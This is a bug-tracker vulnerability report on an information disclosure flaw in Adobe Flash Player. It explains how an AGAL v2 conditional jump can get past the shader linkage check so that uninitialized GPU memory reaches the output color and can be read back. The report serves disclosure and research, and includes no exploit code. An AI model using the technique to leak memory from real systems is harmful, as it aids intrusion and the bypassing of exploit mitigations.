New issue
Advanced search Search tips

Issue 238 attachment: ReadMe.txt (2.1 KB) 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
 
1. Adobe Flash Player Information Disclosure Vulnerability

This is an interesting bug related to AGAL (http://www.adobe.com/devnet/flashplayer/articles/what-is-agal.html).

HelloTriangleColored project is from Adobe, which is to display a triangle (http://www.adobe.com/devnet/flashplayer/articles/hello-triangle.html).

HelloTriangleColoredError project removes "mov v0, va1", which means that "v0" is uninitialized. Flash Player projector content debugger should raise this error:

Error: Error #3632: AGAL linkage: Varying 0 is read in the fragment shader but not written to by the vertex shader.
	at flash.display3D::Program3D/upload()
	at HelloTriangleColoredError/initMolehill()

Obviously, Flash Player disallows us to store uninitialized value to the output register "oc" by the linkage check.

Adobe introduced AGAL v2 in Flash Player 14 (https://forums.adobe.com/thread/1493673).

AGAL v2 contains conditional forward jump, which can be used to bypass the linkage check.

HelloTriangleColoredLeak project wraps conditional instructions around "mov v0, va1", and this condition is never satisfied, so "v0" is uninitialized.

However, linkage check still thinks that it is eligible, so we can store uninitialized value to the output register "oc", which could lead to information disclosure.

In Windows 8.1 x64, the color of the triangle displayed by HelloTriangleColoredLeak.swf was black and changing dramatically.

Context3D supports drawToBitmapData (http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/display3D/Context3D.html).

According to the Project Zero article, it might be possible to leak a pointer by some tricks (http://googleprojectzero.blogspot.com/2014/08/what-does-pointer-look-like-anyway.html).

I think Chris is good at such tricks :P.

These have been tested with Flash Player Projector 16.0.0.235 in Windows 8.1 x64.

Chrome is also ok, but make sure that the GL_RENDERER is eligible (http://blogs.adobe.com/flashplayer/2014/09/stage3d-standard-profile.html).

2. Credit

Jihui Lu of KeenTeam (@K33nTeam) is credited for this vulnerability.